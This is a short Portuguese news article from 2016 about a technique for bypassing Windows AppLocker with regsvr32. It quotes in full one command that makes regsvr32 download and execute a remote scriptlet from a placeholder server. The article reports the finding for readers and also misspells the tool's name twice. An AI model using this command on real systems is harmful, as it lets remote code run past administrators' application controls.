Nova vulnerabilidade do Windows permite que hackers executem qualquer programa
Por Anderson Nascimento | 25 de Abril de 2016 às 09h02
Uma falha na função AppLocker, existente há anos nas versões corporativas do Windows 7 e Windows Server 2008 R2, tem tornado o recurso praticamente inútil. Por meio do Redvr32, hackers podem ignorar qualquer tipo de restrição imposta pelo AppLocker e acessar todos os arquivos e softwares instalados no computador.
O AppLocker é um recurso que permite aos administradores especificar quais usuários ou grupos de usuários podem executar determinados aplicativos com base em suas identidades. Utilizando-o, é possível criar regras para permitir ou negar aos usuários o uso de determinados aplicativos instalados no computador. Já o Regvr32 é uma linha de comando que pode ser utilizada para registrar e cancelar bibliotecas DLLs. Utilizando essa técnica, é possível ignorar quaisquer registros no sistema.
A vulnerabilidade foi descoberta há uma semana por Casey Smith. Morador do estado norte-americano do Colorado, ele publicou o achado em seu blog e um dos scripts (regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll) no Github como prova de que o que havia encontrado é uma vulnerabilidade real e que pode ser explorada. Segundo Smith, o problema não requer nenhum tipo de permissão do administrador e não realiza nenhuma mudança no registro, por isso é difícil rastreá-lo.
A Microsoft ainda não se pronunciou sobre o assunto e não lançou nenhum patch de atualização para solucionar o problema. É de se imaginar que a equipe de segurança do Windows esteja trabalhando em uma solução e que em breve ela seja disponibilizada por meio do Windows Update.
Fonte: CSOOnline